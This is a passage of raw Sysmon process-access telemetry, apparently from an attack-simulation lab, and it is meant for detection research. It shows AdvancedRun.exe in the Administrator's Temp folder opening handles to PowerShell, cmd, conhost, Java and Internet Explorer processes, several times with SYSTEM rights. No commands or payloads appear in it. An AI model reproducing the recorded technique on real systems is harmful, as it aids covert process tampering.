20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080517Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080515Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080514Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080513Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080512Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080511Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080510Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080508Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.e